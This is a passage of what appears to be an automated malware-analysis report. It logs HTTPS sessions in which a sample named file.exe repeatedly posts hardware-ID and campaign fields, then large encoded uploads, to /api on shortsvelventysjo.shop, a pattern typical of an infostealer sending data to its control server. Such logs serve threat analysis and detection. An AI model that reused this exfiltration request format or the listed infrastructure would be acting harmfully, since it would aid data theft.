                                                2024-04-25 15:39:00 UTC1369INData Raw: 41 73 4e 43 72 56 41 62 58 7a 30 5a 4d 4d 39 62 53 52 49 4e 35 36 79 71 44 56 69 79 79 56 65 4b 72 78 44 4f 39 42 47 42 38 42 6d 54 7a 31 4c 49 65 54 49 65 44 62 46 4d 6d 31 35 6b 69 37 6e 53 6a 54 65 46 4d 52 39 41 35 71 71 44 43 63 4f 49 47 62 68 78 67 42 37 6e 58 72 56 4d 54 77 38 70 64 54 54 50 55 32 55 36 4f 5a 4f 73 68 69 56 55 39 76 56 62 69 70 4d 4d 39 74 45 63 71 56 43 4e 6e 32 4c 6a 71 57 51 79 46 6d 77 30 45 42 4e 66 58 55 59 70 73 2f 43 2f 4b 50 55 53 6b 48 49 4c 4d 31 31 6a 52 4c 32 34 54 59 55 2f 72 6b 65 70 61 47 74 66 49 54 6b 38 39 31 4e 35 46 67 47 48 74 4b 6f 35 57 49 62 42 54 36 61 2f 44 50 62 52 4f 4a 78 31 71 41 37 66 55 36 68 42 38 72 71 67 50 51 79 36 61 67 51 6a 46 51 4d 77 49 70 6c 49 31 2b 7a 71 42 75 49 42 59 30 56 31 47 66 77
                                                Data Ascii: AsNCrVAbXz0ZMM9bSRIN56yqDViyyVeKrxDO9BGB8BmTz1LIeTIeDbFMm15ki7nSjTeFMR9A5qqDCcOIGbhxgB7nXrVMTw8pdTTPU2U6OZOshiVU9vVbipMM9tEcqVCNn2LjqWQyFmw0EBNfXUYps/C/KPUSkHILM11jRL24TYU/rkepaGtfITk891N5FgGHtKo5WIbBT6a/DPbROJx1qA7fU6hB8rqgPQy6agQjFQMwIplI1+zqBuIBY0V1Gfw
                                                2024-04-25 15:39:00 UTC1369INData Raw: 75 68 35 38 72 74 77 42 4c 46 33 44 73 53 48 75 4b 2b 6f 70 79 67 31 74 2b 31 54 6a 6f 63 6b 32 74 46 59 72 45 6d 49 41 75 74 71 75 56 68 66 46 78 30 74 44 4d 39 6e 56 51 59 4a 6f 34 69 47 44 57 79 61 30 45 71 54 50 70 56 76 36 51 7a 5a 55 4e 55 33 7a 38 72 46 64 47 4d 69 44 4a 79 38 70 6c 4c 45 68 6e 41 4f 47 54 73 70 53 49 2f 73 4b 71 4f 66 43 50 72 39 45 4a 42 4a 70 43 72 58 5a 72 31 34 66 78 73 78 4c 51 6a 4c 56 32 55 47 4d 61 75 73 67 67 46 34 70 74 6c 48 73 6f 59 35 2b 30 69 39 46 56 47 6f 58 38 34 76 6f 48 6a 54 65 7a 6b 4e 44 64 72 4b 79 56 63 73 44 68 6a 7a 69 50 6b 54 37 56 65 62 6e 6c 6e 4c 36 54 79 49 51 61 67 2b 2b 30 4b 4a 62 45 4d 2f 47 54 30 77 6b 30 74 6c 4e 6c 33 6e 74 4c 49 39 5a 4c 4c 74 57 37 4b 37 49 4d 37 34 45 59 48 77 47 5a 50 50
                                                Data Ascii: uh58rtwBLF3DsSHuK+opyg1t+1Tjock2tFYrEmIAutquVhfFx0tDM9nVQYJo4iGDWya0EqTPpVv6QzZUNU3z8rFdGMiDJy8plLEhnAOGTspSI/sKqOfCPr9EJBJpCrXZr14fxsxLQjLV2UGMausggF4ptlHsoY5+0i9FVGoX84voHjTezkNDdrKyVcsDhjziPkT7VebnlnL6TyIQag++0KJbEM/GT0wk0tlNl3ntLI9ZLLtW7K7IM74EYHwGZPP
                                                2024-04-25 15:39:00 UTC1369INData Raw: 49 65 44 65 6b 63 34 31 4e 35 63 6c 43 62 4b 4b 34 31 55 4f 61 74 46 35 65 65 41 57 4e 45 76 62 68 49 74 56 2f 47 41 35 44 5a 2f 72 6f 4e 4c 56 58 61 43 6d 78 72 58 4d 4c 68 32 33 51 56 39 30 7a 6e 31 36 61 5a 62 6f 79 78 46 66 79 30 5a 38 34 76 6f 44 46 71 74 71 43 51 45 4a 4a 71 42 43 4d 55 73 37 6a 65 59 55 79 79 74 55 61 32 5a 38 42 65 73 54 69 6b 45 61 68 69 38 6b 2b 51 32 66 36 36 44 51 41 52 75 6d 4f 41 69 37 67 43 47 5a 59 4e 53 4e 4b 70 45 35 37 66 4a 63 4e 49 76 52 53 73 6a 5a 39 69 34 36 6b 5a 55 6e 59 45 50 63 54 58 55 31 30 32 54 65 71 41 43 6e 46 38 6f 71 31 58 39 71 49 35 2b 30 69 39 46 56 47 74 50 36 35 48 35 45 48 79 75 71 41 39 41 4a 35 71 42 43 4e 55 35 74 6e 44 5a 41 6e 2f 70 4f 6f 47 34 67 46 6a 52 58 55 5a 2f 42 6b 2b 6c 6b 2f 49 63
                                                Data Ascii: IeDekc41N5clCbKK41UOatF5eeAWNEvbhItV/GA5DZ/roNLVXaCmxrXMLh23QV90zn16aZboyxFfy0Z84voDFqtqCQEJJqBCMUs7jeYUyytUa2Z8BesTikEahi8k+Q2f66DQARumOAi7gCGZYNSNKpE57fJcNIvRSsjZ9i46kZUnYEPcTXU102TeqACnF8oq1X9qI5+0i9FVGtP65H5EHyuqA9AJ5qBCNU5tnDZAn/pOoG4gFjRXUZ/Bk+lk/Ic
                                                2024-04-25 15:39:00 UTC1369INData Raw: 78 57 4a 4a 58 49 58 49 68 37 36 6d 6d 43 52 43 4b 33 45 71 54 6c 6a 6e 79 2b 54 79 49 52 61 68 2f 38 77 62 70 56 47 4e 4f 50 53 31 5a 32 6c 4a 73 4b 6c 47 44 69 4e 34 52 53 59 4b 70 45 35 37 66 4e 4e 62 30 49 4a 67 56 67 41 2f 4f 64 36 42 34 42 7a 73 39 4a 53 53 4f 56 79 46 79 47 66 65 70 70 67 6b 51 69 74 78 4c 56 36 61 5a 62 30 51 51 32 56 44 56 4e 38 2b 61 70 55 42 72 43 31 56 34 4a 46 74 48 56 53 59 6c 71 36 6d 58 45 50 55 54 51 45 75 7a 6e 6c 6e 4c 70 43 6b 5a 2f 42 6b 2b 33 77 75 6f 47 56 70 57 52 46 42 46 6c 6a 59 6b 59 37 51 44 79 61 2b 49 2b 4e 74 4d 35 67 65 66 59 63 4f 49 47 66 46 6f 46 5a 4e 69 54 75 42 35 4d 68 34 4d 49 52 79 54 49 33 30 6d 54 61 4b 6f 62 74 46 51 69 74 42 37 6b 72 4d 34 33 71 6c 49 31 57 47 55 4d 71 63 6d 55 59 44 2f 4a 78
                                                Data Ascii: xWJJXIXIh76mmCRCK3EqTljny+TyIRah/8wbpVGNOPS1Z2lJsKlGDiN4RSYKpE57fNNb0IJgVgA/Od6B4Bzs9JSSOVyFyGfeppgkQitxLV6aZb0QQ2VDVN8+apUBrC1V4JFtHVSYlq6mXEPUTQEuznlnLpCkZ/Bk+3wuoGVpWRFBFljYkY7QDya+I+NtM5gefYcOIGfFoFZNiTuB5Mh4MIRyTI30mTaKobtFQitB7krM43qlI1WGUMqcmUYD/Jx


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.549709104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:39:00 UTC288OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 12836
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:39:00 UTC12836OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 34 31 44 45 37 35 31 35 46 39 42 37 39 43 35 35 32 32 41 37 31 46 43 30 43 45 33 44 36 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74
                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2C41DE7515F9B79C5522A71FC0CE3D6E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"ErN1Nu--crypt
                                                2024-04-25 15:39:01 UTC810INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:01 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=9sutf2rd0jt7lsu47f1knp6ig7; expires=Mon, 19-Aug-2024 09:25:40 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCZLv5JASBruZXeI7o3P%2BJZ3hwk4IoAL%2FP8mZ01xETO4oe10%2BUfb9Jga7Vw%2Fcl8VShDABWAM0MFEY%2BcvpuJ6YgFf5qEvCRYLNYK0mtKIASTrae2YFhVt1Pmq9axjKU9%2FM1ON3umMCkGK"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c625f888bb7-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:39:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                Data Ascii: 11ok 185.152.66.230
                                                2024-04-25 15:39:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.549710104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:39:01 UTC288OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 15078
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:39:01 UTC15078OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 34 31 44 45 37 35 31 35 46 39 42 37 39 43 35 35 32 32 41 37 31 46 43 30 43 45 33 44 36 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74
                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2C41DE7515F9B79C5522A71FC0CE3D6E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"ErN1Nu--crypt
                                                2024-04-25 15:39:02 UTC804INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:02 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=gobl6akfr35r1gvcaa10eqhjfo; expires=Mon, 19-Aug-2024 09:25:41 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IyTF1M9dqqC4Fdwu1TNPzXXLwVDI8lcPrXKD6bB4jzSz%2FCLMzRJ0AIKFCvBEuXhRCFCM2m5YHW%2FFLedm5izM2vv2%2FBIUkS0iwY2ZH4aA4tnzwn24y7Y9XkzQjgrdECeCCg51mYn9Orme"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c680f7f4578-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:39:02 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                Data Ascii: 11ok 185.152.66.230
                                                2024-04-25 15:39:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.549711104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:39:02 UTC288OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 20568
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:39:02 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 34 31 44 45 37 35 31 35 46 39 42 37 39 43 35 35 32 32 41 37 31 46 43 30 43 45 33 44 36 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74
                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2C41DE7515F9B79C5522A71FC0CE3D6E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"ErN1Nu--crypt
                                                2024-04-25 15:39:02 UTC5237OUTData Raw: 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                                2024-04-25 15:39:03 UTC804INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=fdpsstmtftmb06rp3b5gi95r6b; expires=Mon, 19-Aug-2024 09:25:42 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DW1hf5cIkGmQZE5WLd%2B4EFUu4HxZ2gi2vXWtWnXds5rsu4yKPzalwowOgrSX7Z91CWx%2BhRFmuoZhc74Lp8faTNHfWqPbtFl%2BoxliVXKH9hJSyB4gLdX6vkFO4aA3gbi4Xy7mOsY5GqME"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c6ddfc1676e-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:39:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                Data Ascii: 11ok 185.152.66.230
                                                2024-04-25 15:39:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.549712104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:39:03 UTC287OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 7089
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:39:03 UTC7089OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 34 31 44 45 37 35 31 35 46 39 42 37 39 43 35 35 32 32 41 37 31 46 43 30 43 45 33 44 36 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74
                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2C41DE7515F9B79C5522A71FC0CE3D6E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"ErN1Nu--crypt
                                                2024-04-25 15:39:04 UTC806INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:04 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=2olluubr4409e4iiqc8pf3fj4n; expires=Mon, 19-Aug-2024 09:25:43 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vl7Ky5MjPMTVp0CyP7Jt1NTkvGBSGP8icRLhENecZJeNaBVI5bLDMYg2tLXfTvXha%2BjBb%2Bnez6i0SuNwYvmfVjBMyrR9oVS65eVbqNtHc4P8DLfe239Gw903%2FfmxxX8I3A4ifGQ%2Fqc3u"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c750f8e78cc-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:39:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                Data Ascii: 11ok 185.152.66.230
                                                2024-04-25 15:39:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.549713104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:39:04 UTC287OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 1367
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:39:04 UTC1367OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 34 31 44 45 37 35 31 35 46 39 42 37 39 43 35 35 32 32 41 37 31 46 43 30 43 45 33 44 36 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74
                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2C41DE7515F9B79C5522A71FC0CE3D6E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"ErN1Nu--crypt
                                                2024-04-25 15:39:05 UTC808INHTTP/1.1 200 OK
                                                Date: Thu, 25 Apr 2024 15:39:05 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Set-Cookie: PHPSESSID=r3j193ggtlohn6ajilkcvouee9; expires=Mon, 19-Aug-2024 09:25:43 GMT; Max-Age=9999999; path=/
                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                Cache-Control: no-store, no-cache, must-revalidate
                                                Pragma: no-cache
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=psNmhGfQ5qAqIS4Y60jDvgpYZNFCGuyCidxB82It8iDA6bfbf0%2FKQSy0cSsSGKfO1nJjxUU6LUWv1XkGszm64Rq1uNI40PYYo6z2GZi%2FkzThmL%2F4lja5JWu67uQ9x9%2FItAPjU%2FoYEUba"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 879f6c7a2dcab062-ATL
                                                alt-svc: h3=":443"; ma=86400
                                                2024-04-25 15:39:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                Data Ascii: 11ok 185.152.66.230
                                                2024-04-25 15:39:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.549714104.21.16.2254436608C:\Users\user\Desktop\file.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-25 15:39:05 UTC289OUTPOST /api HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                Content-Length: 598368
                                                Host: shortsvelventysjo.shop
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 34 31 44 45 37 35 31 35 46 39 42 37 39 43 35 35 32 32 41 37 31 46 43 30 43 45 33 44 36 45 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 45 72 4e 31 4e 75 2d 2d 63 72 79 70 74
                                                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"2C41DE7515F9B79C5522A71FC0CE3D6E--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"ErN1Nu--crypt
                                                2024-04-25 15:39:05 UTC15331OUTData Raw: ed b0 8a f2 b2 30 dd 54 3e 1f 1b b8 25 b1 4d 52 54 52 fb ec 38 fd 8f fb 58 ea 88 76 c5 ce ee 75 5a c5 6d 43 b6 9d 27 72 dc 66 57 db d9 0b c2 9f 1b 85 ec a5 ad b3 e3 23 84 81 0f ca 10 03 2a 5b de e1 8d c1 39 f1 bf 02 44 df a1 2e 25 2a 9c 00 02 ac ef 27 97 9d d1 7c 35 66 5b c7 51 6c 76 15 56 88 4b aa 3b 3a 5a 04 77 5a d1 82 0a dd da bf c9 fd 6d de 34 07 80 41 8d 01 a0 b4 c4 87 ba 0d 47 c6 c2 8a 9d bd bb 34 99 ee 11 49 6f 27 3d 3a 6a e4 39 13 26 bf 22 44 10 3e af e3 eb ac bf df 7e 7f 2c 96 2e d1 79 e1 6c b6 f1 d2 45 90 da e5 6b 2f 2c a2 a7 ee b2 77 dc c4 f1 49 fc aa 02 e2 30 e2 08 1a d6 67 e6 77 25 33 6c 9d 6f 2b b4 26 e9 61 f2 03 ec 8f 9a af 9c 77 42 34 ee f2 4b e0 be 4a 4d b1 25 9b 7e 0a 8d ad 69 35 8a 1a 54 2c 58 de 3a f8 5f be 84 ab f1 c6 8a f9 18 91 a1
                                                Data Ascii: 0T>%MRTR8XvuZmC'rfW#*[9D.%*'|5f[QlvVK;:ZwZm4AG4Io'=:j9&"D>~,.ylEk/,wI0gw%3lo+&awB4KJM%~i5T,X:_
